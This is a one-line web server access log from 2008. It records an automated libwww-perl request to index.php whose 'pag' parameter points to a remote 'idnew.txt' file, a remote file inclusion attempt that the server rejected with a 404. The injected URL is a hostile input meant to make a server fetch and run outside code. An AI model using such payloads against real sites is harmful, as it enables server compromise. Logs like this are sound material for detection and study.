204.15.10.22 - - [21/Aug/2008:10:34:28 -0700] "GET /logs/index.php?pag=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
